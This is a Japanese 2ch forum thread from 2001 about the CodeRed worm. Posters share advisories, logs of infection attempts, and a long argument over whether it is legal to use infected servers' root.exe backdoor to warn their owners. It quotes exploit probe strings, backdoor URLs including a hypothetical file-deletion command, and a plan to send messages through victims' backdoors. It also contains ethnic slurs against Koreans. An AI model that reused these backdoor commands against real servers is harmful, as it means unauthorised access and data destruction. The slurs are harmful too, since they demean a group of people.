コードレッドパート5 日本政府は反省汁

.∧＿∧　　／￣￣￣￣￣￣￣￣￣￣￣￣＼
（　´∀｀）＜　お前らまだやってんのかよ　　　|
.　　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿／

優良スレはまだまだ続く　 CodeRed スレ Part5.
ひょっとして 9/30 まで続くのか？
まもなく新しい亜種が登場する？ 基本はマターリでお願いします。

〓〓〓 WindowsNT4.0/2000 ユーザーはチェックしよう 〓〓〓
1.インデックスサービスを停止しても感染予防になりません
2.ログオンして Ctrl-Alt-Del を押す
3.「プロセス」タブを選択する
4.Inetinfo.exe プロセスを探す
5.見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
　　すぐに↓をチェック！
　http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
さらに前↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662

とりあえずここを読め！
Code Red (主にII) 関係のリンク

IPA：「Code Red ワームに関する情報」
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

マイクロソフト：対処方法
http://www.microsoft.com/japan/technet/security/codealrt.asp

橋本 喜代太氏：Code Red II についての警告
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

オランダでの観測と、東アジア爆発の中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

首相官邸へ提言　トロイの木馬型ウィルス「CodeRed」対策を求める
http://www.interlink.or.jp/notification/backno/2001/info012.html

　

立てたよん。

おまけ
http://isweb24.infoseek.co.jp/computer/titikun/CRhuri.htm

タイトル長すぎでエラーでたので、ちょっと修正しました。

おー９１７さんおつかれ

おれもかちゅ〜しゃなんだけど、ブラウザ立ち上げたよ(w

ここは良い板だ

┌─────┐
│ ｳｨｿNT ..　 .│　　　　　　　ルーター
│　 IIS　　 .┏┷┓EtherNet.┏━┓Internet
│(´д｀)　　┃80┠────┨80┠─────（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜
│　　↓ . . ..┗┯┛　　　　　. ┗━┛
│　 ISAPI　 . .│
│　　↓　 .　 . │
│IndexServer│
└─────┘

┌─────┐
│ ｳｨｿNT　　 .│　　　　　　　ルーター
│　 IIS　.　 ┏┷┓　EtherNet　┏━┓Internet
│(´д｀)　　┃80┠（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜
│　　↓　　 ┗┯┛　　　　　　..　┗━┛
│　 ISAPI 　. .│
│　　↓ 　 　 ..│
│IndexServer│
└─────┘

┌────────┐
│ ｳｨｿNT　　　　　　　│　　　　　　　ルーター
│　 IIS　　　　　　　┏┷┓　EtherNet　┏━┓Internet
│（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜
│　　↓　　　　　　...┗┯┛　　　..　　　　┗━┛
│　 ISAPI　　　　　 .　│
│BufferOverFlow! 　.│
│ 　 　　　 　　 　 　 　│
└────────┘

┌────────┐
│ ｳｨｿNT 　　　　 .　　│　　　　　　　ルーター
│　 IIS　　　　　　　┏┷┓　EtherNet　┏━┓Internet
│（ﾟ∀ﾟ)ｱﾋｬﾋｬﾋｬ（CodeRedﾟ∀ﾟ)ｱﾋｬﾋｬﾋｬ（CodeRedﾟ∀ﾟ)ｱﾋｬﾋｬﾋｬ
│　　↓　　　　.　　 ┗┯┛　　　..　　　　┗━┛
│ 　 ISAPI.　 .　 　 　 │
│BufferOverFlow!. 　│
│　　 .　　　　　　 　 　│
└────────┘

さて、ﾒｼでもｸｰﾃこよ。

ごくろーさんです。

>>1=前917 お疲れ〜。

しかし、マジ終わらんねぇ。
今日になって減少傾向も止まってしまった。

前スレの923さ〜ん。
結果報告してね(w

>>12
それだけどさ、なぜちょと増えたがわかるひといる？

管ですな　というかうちは１日平均２５０〜３００
飯食ってくる

ひさびさage

全然状況　改善されておりません。211.*.*.*　9割糞チョン

まだまだすくねーよ、もっとがんばれよ赤虫。

うちのアパッチにこんなログあった。新種?

172.*.*.42 - - [14/Aug/2001:14:28:46 +0900] "GET /x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=x%20HTTP/1.1
HTTP/1.0" 404 276
172.*.*.42 - - [14/Aug/2001:14:53:19 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287

新種じゃないでしょ〜
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
アタックされてます(w

>>19
でもアパッチだよ?

>>18　外からバックドアたたいてるんじゃん

UNIX + apache だからIP知られることもないんだけどなぁ

こんどはバックドア叩いて回るワームが出たのか？

この AAAA ってやつと /scripts/root.exe?/c+dir はセットで残るんだよ

インターリンクがテストしてるんじゃないの。
あたりかまわずバックドア探し→コードレッドと変わらないって

でも、x.ida?AA〜 だから、そんなファイルないでしょ?

いたずらなのかなぁ

＞UNIX + apache だからIP知られることもないんだけどなぁ

近所の適当なアドレスに出してる

性質上、一匹見つけたら近所に一杯いる可能性が高いからね。

AAAA...は多分eEyeのチェッカー。

>>29
正解

今日ISSのセミナーに行ってきたよ。
ここで知ったことのおさらいって感じだった。
ところどころいいかげんだったけど。

セミナー後に亜種の話とかすこし聞いたけど、
OSが日本語版かどうかのチェックをしている亜種があるって言ってた。

ま、どこまでホントかわかんないけど。

>>28
ゴキブリと同じですな(w

8/15に日本のだけ起動不可にするなんてのだったらけっこう
すごい事になるね。

ちょいゲフインだけどインターリンクねたうぷしたよ。

下品以前に....

>>35
絵はへたヨ
コードレッドバスターってこういうことじゃないの？
バックドアから無理やり入る

裏口チェッカー
http://127.0.0.1/scripts/root.exe?/c+dir

既出？

>>34
うほうほっ

>>18
もしこれが新種だとすると
近所のIP総に対してスキャン&ノックの2連発を発射。
ノックに返事したIPを返信って感じか？

あぁ、日本語ﾍﾝﾀﾞﾈ
総スキャンといいたかったｱﾙﾈ

更に39だったｱﾙﾈ

>>37
　思いっきり。でも、気にしなくていいよ。
　ただ、それで確認するのは勧められない。

みんな祭りに行ったか(w

祭りって珍走のことか？

全然興味無いんだけど、CodeRedProveっての見つけたよ。
ttp://ueno.cool.ne.jp/zeiger/vernichten.html

CordRedからのアタックを検知して、
送られてきたデータをバイナリで記録する事も可能、

だってさ。

GET /default.ida?XXXXXX...
を見に来たIPで、http://（そのIP)/ってブラウザ見に行くと、
IISでなくてPWSが立ってることあるんだけど、こういうものなのかな？

HEADを送ってWWWサーバーが何か確かめよう。

>>45
すまんが、前々スレで既出だ。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377&st=952&to=952&nofirst=true
しかし、proveって、普通probeなんだが、
なんか意味があるのか？
どちらかと言うと、同じく既出のCodeRedWatcher
というのの情報きぼんぬ。

そろそろ寝る

オヤスミ

さて、みなさんの所は未だ連日連夜相当数のアタックを受けているのでしょうか？
私のところは11日以降ぷっつりと途絶えました。

14日は139回

総数はかなり減ったけど、odn.ad.jpはむしろ増えてるところが恐ろしい

チョソンからラブコールが続く・・・

お盆明けにまた増えるよ。sage

>>46
不可能ではないよ。
ポート80がIISでポート8080がapacheとかね。

ん？違うかも？

>>51
うちは173回です。
昨日あたりから減少が止まって若干増えてる
http://www.kondo.homeip.net/codered.html
盆だから評価しずらいけど、定常状態かなあ

実際同じプロバの人間からcoderedアタック食らった時は
ISPにmail出したほうがいいのかな？

俺が管理者ならそんなメールウザイだけなんだが

シスコーンな人向けだそうな
http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml

.jp からのアタックは減って来ている。

前スレ890じゃないが、/.Jがコードレッドバスターで盛り上がってる。(w
妙に粘着なコメントも。恨みでもあるのか？(もしかして某社のユーザ？)

http//slashdot.jp/comments.pl?sid=01/08/14/0712213&op=&threshold=0&commentsort=0&mode=thread&startat=&pid=17#22

くらあM$！お前らが直接マスコミでも何でも使ってお前らの客に不良品の注意を呼び掛けろ！
他人のせいにすんな迷惑M$！

interlinkが泣いてます。
なにも総理大臣にチクらんでも・・・・
そんなに深刻なのか???

ttp://www.asahi-net.or.jp/~KI4S-NKMR/

まぁM$だからね

だからＭ＄を使っちゃいかんとあれほど…

M$は反省汁ー！

M$は全世界の管理者に残業手当を支給しろ。

セキュリティってなんですか？

マスコミはテレビ映えするWeb書き換えのみ報道。
マスコミは長期大規模IP被害のCodeRedよりもHTMLの文字列をより重要視。

マスコミが素でわかってないなｎてことないかな?重要度

今だにWin2000はいいOSだとか言って今日も買う馬鹿がいるからな。
まあ馬鹿は他人から自分のPCに何されても構わないんだろ。
ただ周りにパケットをばらまくのだけは止めてもらいたい。

２０００の次は　どうなんだろう？

>>73
メールハックされたとか騒いでる人ですか？

あれはもう解決しました　犯人は速攻で捕まるでしょう



まぁ　いろいろあったけどさ　よろしくね

この名前書いてるだけで　荒らしが追ってくるから


そのうち匿名になるかもしれないから　そこんとこも　よろしく

とにかく　穏便に話をしたいだけさ　

>>75
SPAMでトラフィックを増大させ、バックドア仕掛けられて晒された人だ。
人間CodeRedの称号を授けます。

>72
テメーは何使ってんだよ。
Beか？Macか？BSD？それともLinux？
ケッ　どれも同じようなもんだな。

いっぺん死んどく？　>>78

>>78
人間IISのほうが適切かと...

どうでもいいや　おまえらは無視しよう

ほかの人に迷惑になるしな

http://www.security.nl/misc/codered-stats/detailed-v2.html
企業のサーバーなど対処されて然るべき所は概ね対応が済んで、
ダイアルアップユーザーとか、感染してることすら気づいていない奴だけが
残ってるって感じでしょうか。

WIZたん出張もどきは？（藁

ぬけてると言うか
ふぬけと言うか、何かすけーだぜー
もしかしてwin2000使ってんじゃねーの（ｗ
誰とは言わんがな（ｗ

これ電話番号とか設定してあるのかな？今見れなくなったけど。
どいつもふぬけだな（ｗ
Directory of D:\LINUX\release

2001/02/15 18:30 <DIR> .
2001/02/15 18:30 <DIR> ..
2001/02/14 20:40 593 options.pppoe
2000/08/31 19:14 20,740 pppoed-2.0
2000/08/31 20:02 22,260 pppoed-2.2
2000/08/31 04:24 2,898 start-pppoe
2000/08/31 04:24 1,007 status-pppoe
2000/08/31 04:25 577 stop-pppoe
6 File(s) 48,075 bytes
2 Dir(s) 0 bytes free

>>73　さん
その、「２０００の次は　どうなんだろう？ 」って何のことですか？
このスレは CodeRed のスレですよ。２０００ってなんのことかわかりませんが、
CodeRed には２０００云々ってのは全く関係ないと思います。
IIS の問題ではないでしょうか。NT5だけではなくNT4でも問題ですし。

その「２０００」とやらと、「CodeRed」がどう関係するのか、ご教示
いただけないでしょうか？

>>87
WIZたんはチャットセクースとFFXで忙しいので煽ってはいけませんです。（藁

わ〜ん


おまえらみんな知り合いのハッカーに


晒してもらうんだから見テロよ〜

http://www.comnetq.com/mise/gin1/koteng1/aratama.htm
他人のメールアドレス？

誰か泣きながら階段下りていったゾ（ｗ

>>90
わざわざ２ＣＨでメアド入れるというのもくさいよな

>>79
>テメーは何使ってんだよ。

管理者がそう簡単に自社の使用OS言う訳ないだろ。
なんかこいつ、ここでBeとか言うあたり部外者のOSヲタクだろうな。
最近仕事にもならんクソスレが増えたよ。

みんなおはよ

あ、えーんさんだ。

今日の１パツメうぷしたよ

もうねたぎれ　　だれかいい画あったらおしえておくれ

会社の方針でWin2000をサーバにしていた所は死んでください。

某プロバイダから攻撃が来てて、警告のメールを出したら一時は
おさまってたんだけど、今度はどうやらそこの DNS に感染した
模様……しっかりそこから攻撃が。こんな会社があるからこんな
ことになるんだよなぁ……ぶつぶつ。

>>72はWin2000を買ったんだね。

レポート元 [Animefantasia] p2p.animeshare.com:8875
Wednesday, August 15, 2001 10:36:44

ユーザ名 : font12345
ｱｸｾｽﾚﾍﾞﾙ : User
ｵﾝﾗｲﾝ時間 : 7:27:29
入室ﾁｬﾝﾈﾙ :
状態 : Active
共有ﾌｧｲﾙ数 : 55
現在のﾀﾞｳﾝﾛｰﾄﾞ : 0
現在のｱｯﾌﾟﾛｰﾄﾞ: 1
接続種類 : DSL
ｸﾗｲｱﾝﾄﾊﾞｰｼﾞｮﾝ : WinMX v2.6j

最悪の持ち逃げﾔﾛｳ。

こちらで、ヲチのＷＩＺスレに苦情を書き込まれた方はいらっしゃいますか？

>>73
他所の板にまで迷惑をかけるな。
まず、ネットウォッチ板に帰ってきて、
君の流した”電波スパム”について、全面的に謝罪しようか。
話はそれからだ。

おはよ〜。なんかちと荒れてるね。

>>46 亀レスすまん
Win98 で PWS つかってて、Win2K にアップグレートとかすると、
そういう状態 (サーバーは IIS, コンテンツは維持) になるみたいよ。

>>102
申し訳ありません。
うちのｽﾚのふとどき者がＷＩＺを騙って暴れているんです。
(本人確認済み)
そのものは近いうちになんとかしますので、無視をお願いします。

>>103
気にせんでいいよ
泣きながら帰ったみたいだから　>>91

http://www.microsoft.com/japan/technet/security/redfix.asp
Code Red II ワームの既知の影響を排除するツール

Kaspersky って人が www.viruslist.com で記事書きつつ
CodeRed 駆除？ ツールをあげてますね。
http://www.viruslist.com/eng/default.asp
の
「Don't Cut Off Your Nose to Spite Your Face」って記事。
なかなかアレげでよい
がいしゅつ？

unzip ると 「Kaspersky Anti-Virus Internet Server Extension」
という機能をIISにアドオンする DLL が出て来ます。
ソースも公開してるみたい。
やばそな GET ブロックしたりログ取ったりするようですな。

>>105-107
素敵

exploitによるサーバ侵入でも、不正アクセス禁止法で挙げられるみたいだけど。
CodeRedを侵入させた場合も黒だよね。被害届出したらどうなる？

また、MSが例によってバッファオーバーフローを「仕様だ」とした場合。
exploitによる外部からの機能変更も「仕様にある機能を利用した」だけ
って事にはならないのかな。

アタック元のIPのWWW見に行ったらCodeRedじゃなくて
SunOS/BoxPoison.wormだった。
ウイルスチェッカ更新しといてよかったよ。
まあ自分はWinだからどっちみち問題ないだろうが・・・
ちなみにHPにはこんなメッセージが表示されていた。
fuck CHINA Government
fuck PoizonBOx

不正アクセス行為の禁止等に関する法律
http://law.e-gov.go.jp/htmldata/H11/H11HO128.html

ぐがっ停電で３台とも落ちたよ・・・
とりあえずカミナリが赤虫よりコワ。オフトピすまぬ。

>>109
> また、MSが例によってバッファオーバーフローを「仕様だ」とした場合。
「例によって」って、過去にそんな例あったっけ？
煽りじゃなくてマジ質問。

不正アクセス禁止法の3条の3にこうある。
>　三 　電気通信回線を介して接続された他の特定電子計算機が有するアクセス制御機能によりその特定利用を制限されている特定電子計算機に電気通信回線を
>通じてその制限を免れることができる情報又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為

単純に解釈すると「/script/root.exe?/c〜」はこの「制限を免れることができる情報」って事。
少なくともアクセスに際してIDやPASSWDが有ろうが無かろうが鯖管理者の承諾が無いコードで制御を得ると
「不正アクセス」と解されるかもよ？

不正アクセスになるだろうけど、被害届を出しても
>管理者は、‥‥‥‥不正アクセス行為から防御するため必要な措置を講ずるよう
>努めるものとする。
管理が悪いと言われて終わりかも。(藁)

>>109
CodeRedを送出して侵入させた鯖の管理者に責任を問えるかなあ？
ウイルスの被害者が加害者にもなる場合やら踏み台にされた鯖の管理者の責任って
明示されてないんじゃない？

漏れの頭もバッファオーバーフロー

え〜ん氏またなにやらＵＰしてるし・・・

>>110
やだねー。踏ミ台にされてるマシンがとっても沢山ありそうだ
個人的にはこれに乗じて仕込まれる（であろう）その種のモノの
２次被害がむしろ心配。
ヤられたIIS鯖のみなさーん、潔くHDD洗ってね。（藁

違った。3条2項3号だった。

漏れ勘違いしたな？

>>116
まさにそこが問題。
ではあるのだが、意図的にバックドアから侵入した場合の
ほうが悪意があると判断されて不利になりそう。
今回だれか裁判して判例を作ってくれ（ｗ

>>113
いや、バグを仕様とする事を「例によって」と書いてしまった。
ちょっと書き方悪かったスマソ。

>>114
root.exeに触れたら即アウトかと。
CodeRedが自動的に行う「その制限されている特定利用をし得る状態にさせる行為 」って
やつの責任はCodeRed感染サーバーに掛かるのかしらん。

>>115-116
管理者の責任は明示されてるような気が（第五条）、でも罰則は無いね。

>>115
そやね。
しかし、管理義務を怠っている鯖に侵入しても良い訳ではない。

少なくともバックドアで侵入すると「圧倒的に不利」である事は自明。

>>122
感染させた鯖も管理を怠っていた。
そこから送出されたCodeRedに感染した鯖も管理を怠っていた。
「管理を怠った管理者」が「管理を怠った管理者」に文句言う資格はある？

バッファオーバーフロー起こさせようとしたけども相手がApacheだったから
クラックできなかったとかいう場合は罪に問えないのか。

検挙、逮捕、という恥ずかしい結果になろうとも、
実際弁護士、検察、裁判官、わかってんの？　判例というが、
法曹の場でこれほどややこしくなるとサイバー界専用のが居るなぁ。
各方面からの証拠書類あれこれと、膨大な実際裏方作業で報われる結果に
なるのだろうか？

>>126
玄関の鍵穴に違うの差し込んで、ガチャガチャやった感じかな。
実生活で言うと不法侵入未遂ってことか。補導の対象だな。。Ｗ

アタックされて煩いわ、復讐しようとすれば犯罪者だわ、面白くないね。
馬鹿なＮＴユーザーが処罰されない法律そのものに問題があると思われ。
現実にスループット低下という状況がある以上、我々は被害者だ。

執拗なアタックにより現実にこちらが被害を受け、
しかも連絡の手段も無い相手には、
最低必要限な調査としてのroot.exeへのアクセスは、
正当な防衛と主張できると思われ。

例えば、相手が単に無意識の感染によるものなのか、
それに偽装した意図的な攻撃で、今後被害が拡大し
そうなのかどうかなどは、座して待っているだけで
はわからない。

>>129
それは感情論だけで、法的な根拠は何もないぞ。

訪問販売のおばちゃんとか新聞の勧誘員がうざいからって、
殴ったら障害罪だろうねえ。

新しい動きが無いから、同じ話題が繰り返されて、うざったいけど。
code redスレッドらしいといえばらしいかな。

>>129氏とかの有志が警察に宣言した上でバックドアからのIIS停止工作
をやったら見物人としては楽しいからやってみて欲しい。
やるなら正々堂々とね。

不毛な論議だな、誰だCodeREDの肩もつやつは？感染者と思われてもしかたないぞ。法的根拠なぞ両方にない。
前例でしか考えられないのもｱﾎﾟｰﾝ。
怒られた時点で、義務教育で教えて貰ってないもん。これで決定。
イカンならイカんとせっせと広報しない司法が悪い。
おれは、リンク踏んだだけと言えば場合により結構かも。
(飛び先辿られなければね)
どうでも言えるし、裁判官にすれば"ややこしうて爺にはわかりませんわ"ってのが本音だろうな。

>>133
ステキ。マジ惚れた。

EVERYDAY PEOPLEさん復活age
http://people.site.ne.jp/

>>134
サンクス！

をを！EVERYDAY PEOPLE！　この書き入れ時になにやっとったん！
夏休みもご苦労様。正常だったら対応出来なかったと見るが　W
さぁ〜みなさん始まりです〜〜〜えぶりで〜〜ぴぃぽ〜。、、、

まあまあ、マターリと。

正当防衛あるいは緊急避難については、例えば、以下のよ
うなものを参照すると、それほど法的根拠が無いとも言え
ないと思う。
>>130

http://inet.trendmicro.co.jp/contents/solution/industry/natsui990730.htm
正当防衛・緊急非難（明治大学 法学部教授・弁護士 夏井 高人 氏）
正当な理由がないのにメールの中身を読んだ場合には、人格権侵害な
ど損害賠償責任を負うことになります。しかし、それを放置すること
でシステムの安全確保ができないというような場合には緊急的措置と
してメールの内容を読んでしまうこともあり得るでしょうし、法律的
にもぎりぎり許されると思われます。

んでもって、>>132
＞ 警察に宣言した上でバックドアからのIIS停止工作

「最低必要限の調査」と>>129でも書いたと思う。よって
やるのなら他の人やってほしい。

いぢょ。

短期的な論点として、
「メールでの警告が不能な時、root.exeを用いた警告は是か非か？」でどお？

なるほど・・・
例えるなら、震災時の倒壊しそうな危険な建物を故意に潰して安全を確保するようなものか

非。
どうも感情的に「オレはウイルスを送りつけられた被害者だ！」と
主張する向きが多い気がする。
帯域を圧迫されるほど大量に送られてるヤツって多いの？

>>138
現状は震災ほど深刻か？
震度３程度で踏み込まれては堪らんよ。

root.exeと言わないでバックドアと言った方が...
言葉の違いだけなんだけど印象違うね。
root.exeを触っただけでアウトの可能性は高い。
ディレクトリ掘るのは器物破損になるのかな（笑）
net sendするのは...

「バックドアを使う」の定義をCodeRedに当てはめるのと どこからどこまでの行為かが曖昧になる。
「root.exe(cmd.exe含)を使う」の方が明確だよ。

>>141
電子計算機損壊等業務妨害って罪になるのかな

root.exeを使うの方が罪悪感なくていいよ。

確かに「ただのurlじゃん。port80を開放してる方が悪い」とする意見は聞こえてきそうだ。

>>144
メッ！

刑法 第二百三十四条の二
（電子計算機損壊等業務妨害）
人の業務に使用する電子計算機若しくはその用に供する電磁的記録を損壊し、
若しくは人の業務に使用する電子計算機に虚偽の情報若しくは不正な指令を与え、
又はその他の方法により、電子計算機に使用目的に沿うべき動作をさせず、
又は使用目的に反する動作をさせて、人の業務を妨害した者は、五年以下の懲役
又は百万円以下の罰金に処する。
http://law.e-gov.go.jp/htmldata/M40/M40HO045.html

刑法 第三十七条
(緊急避難)
　自己又は他人の生命、身体、自由又は財産に対する現在の
危難を避けるため、やむを得ずにした行為は、これによっ
て生じた害が避けようとした害の程度を超えなかった場合
に限り、罰しない。ただし、その程度を超えた行為は、情
状により、その刑を減軽し、又は免除することができる。
　前項の規定は、業務上特別の義務ある者には、適用しない。

>>148
死ぬ程の事か？(藁

たとえばなんの説明無しに
http://*.*.*.*/scripts/root.exe?/c+dir+"c:\"
http://*.*.*.*/scripts/root.exe?/c+del*****+"c:\"
ってかきこをどこぞの厨房がクリックして消えた場合
どうなるんだ？

海外のサーバーに対してやる場合は何処の管轄なの？インターポール？

刑法 第百七十七条
（強姦）
暴行又は脅迫を用いて十三歳以上の女子を姦淫した者は、強姦の罪とし、
二年以上の有期懲役に処する。十三歳未満の女子を姦淫した者も、同様とする。

>>152
そっちか

>>149
「生命」しか読めないのか？その後ろになんて書いてある？
自由や財産も適用対象だ。

>>150
　あるいは、検索ロボットが、とか。
　過去ログにもそんな話があったな。

>>151
法律は、事象(行為によって生じた被害や事件)が発生した場所の法が適用される。
銃で国境の向こうに居る人間を射殺すれば、射殺された人の居る国の法律で裁かれる。
鯖の被害でも同じ。鯖のある国の法律に従う。
2chは外国にあるが2chの書き込みで誰かが被害を受けたらその人の居る国の法律で裁かれる。

容疑者の逮捕手段は容疑者の居る国の法律に従う。
容疑者の引渡しは各二国間の取り決めがある(らしい)。

>>154
日本語苦手だ。

容疑者が日本国内に居るなら令状無しには逮捕できないね。
現行犯じゃなければ。

加害者はkrにいて、鯖がusにあって、鯖の持ち主は日本人だけど、
twに10年くらい出張中で損害を被ったら？

>>159
鯖の破壊そのものの罪はusの法で、それによって生じた損害はtwでない？

>>156
犯人引渡し条約はアメリカとの間でしか結んでいなかったような・・・
間違ってたらごめん。
んで、確か懲役1年以下の罪に関しては条件を満たさないということで
引渡しはできなかったと思う。不正アクセス禁止法は1年以下の懲役じゃ
なかったっけ？

アメリカのネットゲームでIDぱくった日本人が、インターポールからの
通報を受けて日本で日本の警察に逮捕されたけど、そういう絡みもあって
「日本で捕まえてくれ」ってなったのかな？

しかし韓国にも「サーバをクラックする罪」がある(らしい)から、
告発すれば韓国国内でも刑事事件になるのでは？

つまりroot.exeでdel+"*.*"だと有罪でdir+"c:\"は無罪？
はっきりしてくれ。困るじゃないか。

>>157
何語が得意なの？

ただいま〜

風呂上りのビール(ﾟдﾟ)ｳﾏｰ

例えばさ、アタック来たIPにいきなりバックドア経由のnet send * "感染してる
ぞゴルァ！" (実際これはうまく動くぞ)ってのは、相手に何ら損害を与えてない
よね。いきなりPopup出るから精神的にショック与えるかもしれんが。こちらも
相手のサーバーの内容を一切見てもいなければファイルコピーや勝手にディレク
トリー作った訳でもない。ここまではイケるんでないかとは思うんだが。Perl
あたりで簡単に作れそう。

個人的には支持したいけど、結果、どうなるかは
結局、やってみないとわからない。
お巡りさんに相談してみよう。

HTTP 403.9 - アクセスは許可されていません: 多数のユーザーが接続中です。
インターネット インフォメーション サービス

やれ。ただし条件。

あんたが「やむを得ず」やろうとしている事の影響
　＜　あんたがそいつから受けた損害

「やむを得ず」に注意してね。

codered.com
$19500
で売りに出てます。

>>171
Code Red特需だな（ｗ

容疑者を起訴して有罪にできるかどうかは別にして、そいつをパクる
かどうかは警察の判断。法廷闘争で戦えそうな根拠があるとしても、
だからパクられないとは言えないよな。とりあえず捕まえやすい奴を
パクっておいたほうが、見せしめの効果があるとか判断して
もおかしくない。新左翼の連中なんか駐車違反で家宅捜索されてるしな。

まあ、
あと立証責任がどっちにあると判断されるかだ。
とりあえず、（やむを得ず）を立証する責任は負
わされるだろうな。

他の手段があるような場合はだめよ。

見せしめはやるだろうね、それもマスコミが取り上げやすいようなのを。

「ちょっとまってよー。
法律的には問題あるかもしれないけど、悪いことしようってんじゃないでしょ。」

と書いてこれが無責任な発言であることに気が付いた。
インターネットって難しいね…

Code Redの正体はこいつらだ。
http://www.geocities.com/SunsetStrip/Stage/7717/

悪意が無ければ許されるのではガキの理屈と同じ。

ま、不正アクセス禁止法は親告罪だから、管理者次第なんだろうが

法曹ねたでなんかできないかな〜
う〜ん
今日はうぷおしまい

え〜ん氏そういえば放送局との話進んでるんですか？

>>180
あの背景はなんですか？ゲイツくんはわかりますが

まだやってんの？
早く寝たら？

今日の攻撃、2/3以上日本のホスト。お盆休みから帰っていきなり感染してる
恥ずい奴ら多数と思われ。国辱である。zaqとalpha多数。

>>181
マターリと

>>182
コードレッドから見たＷ２Ｋ（ゲイツ）の穴

プライベートＩＰなのに今日のログ見たら新たな感染者のIPやDNS名が出て来る出て来るハァ

CATV局から感染者はﾓﾃﾞﾑ止めちゃいますんで了承(1秒)して下さいねってﾒｰﾙきたyo
個人的にCATV局(皆から非難囂々なの)を応援してるんで、がんばって欲しいです

>>187
うちのCATVは、プロバイダの運営するサー
バが感染している。しかもお盆休みで放置。
通告しても応答なし。

危機意識をもって対応しているだけマシだよ。

>>188
それ酷いなぁ。
IP晒さなくて良いから、どこのCATVですか。

>>189
横浜のし〜ぷるねっと

>>190
し〜ぷるが感染してるんだ。
うちもし〜ぷるの範囲内だけど、集合住宅だから加入できなかったという苦い経験あり。

個人的にはＣＡＴＶ側の対策が遅れているのはまだ許せるレベルです
それよりも許せないのがＣＡＴＶに裏口を作って運用していた
http://www.keepoint.com/defaultj.asp
のような会社（それも絶対に感染してはならないような事業内容）
域内には2台以上のサーバー立ててやがった
今はモデムが止められたようなので域内の総アタック数は減ったけど根絶は出来ていない

15日のXXXは１４８匹で最低記録更新
明日からどうなるかが気になるところ。

盆の間放置されてるのんきなプロバを晒すスレでもすくリマ消化

本当にいつなくなるんだろう

しかし､帯域共有のCATVでやられると痛いねぇ｡

こういうのを待っていた？
http://www.treachery.net/~jdyson/earlybird/

Early Bird 赤虫を食い尽くす早起き鳥

Apacheで動いているシステムに、特製default.idaを
食わせておくと、自動的に引っかかってきたCodeRed
発信者のWebmaster, Postmasterに警告メールを出す。

まあ、警告メールでつぶせるようなら苦労しないかな？

一件あたりに一通出したりするとspam発生ソフトになっちゃうね。

やっぱりAAAAAAはチェッカーだった。
チェッカーならバックドア叩いていいのか?

自分の管理するマシンならかまわないんじゃないかな。
自分の以外にやるのは悪用だよなあ。

200!

おはようあげ

Ｇｏｏｇｌｅなんでカンコックになってるの？
いつもと違うと思ってジーっと見たけど

日本から解放された記念日だから。
タイトル絵をクリックすると韓国の祝日の一覧の検索にいく。
http://www.google.com/holidaylogos.html

七五三がちょっと楽しみになったね。

google、こんなんもあった。
http://images.google.com/images?q=red+code&btnG=Google+Search

>>204
教えてくれてサンクス

思わずキャプチャーしちゃったんだけど
すてよ

MS Hotmail (NETBLK-HOTMAIL)やMSN (NETBLK-MSN-BLK)から
攻撃されてるみたいなんですけど、コピーしたＯＳつかってるからかな？

>>208
攻撃って、CodeRedII？
だよなぁ、その板なんだし。まだ直してないのかＭ＄・・（泣藁

自転車に乗れるようになりました！！

CR-IIの乱数にはクセがあるみたい。
203.162.12.??? つーベトナムのホストから一時間に一回ぐらい来る。
昨夜ドメインのWebmasterにメール送ったけどまだ続いてる。
政府高官のPCで誰も手出しできないとか…（鬱
下っ端なら騒乱罪で死刑かも…（藁

コードレッド　個人も感染
「このウイルスはマイクロソフト製のホームページ発信用ソフトを組み込んだ
　パソコンに感染。・・・転送速度を落とす・・・」

てあったけど、ＨＰ発信用ソフトって何？　ＨＰ作ってない人は持ってないってことですか？

・・・・・・・・・・・・・。
http://messages.yahoo.co.jp/bbs?.mm=CP&action=m&board=1835584&tid=a5qa5bdkbdava5a6a5a4a5ka59&sid=1835584&mid=1

>>213　サンクス

げ！　ＩＥに感染してるじゃん。こわ

まさかＩＩＳデフォでプリインストールされてるメーカーでもあるんかねー。

ＨＰ発信用ソフト＝ブラウザ　のことだったのねん！　閲覧用ならわかったのにな・・

ん？IISのことじゃないの？

それはないだろーと言いたいけどね

今後の展開次第ではっきりすると思うがハンドル登録が今日なんでネタなのかもしれん。スマソ。

>>213
これCodeRedか？
MXでもやってんじゃネーノ？

>>212
>>214
>>216
本気で言ってﾏｽｶ？

今考えてみたらその他のウィルスも考えられるね。重ね重ねスマソ。

中身無しが多くなったと思ったら
プロバイダがフィルターをつけたってよ
ＩＰ記録してるって

どこのプロバイダ？

なんだなんだ。
夏だから？　ネタ？　もしくは、やぷーからのお客さま？

>>225
具体的にどれが？

CodeRedバスターが完成したらしいゾ！
http://www.interlink.or.jp/notification/backno/2001/info015.html

このコードレッドﾊﾟｽﾀってinterlinkの加入者のIPに対して
有効ってこと？

>>227
　何か、ウイルスとワームの区別がついていないような事が
　書いてあるねえ。ワームだとネームバリューがないので
　あえてウイルスと書いたんだろうか。

>>223　さんはInterlinkかな？

>>226　スマソ　>>221さんへのレスれす

「コード・レッド」感染、個人にも拡大
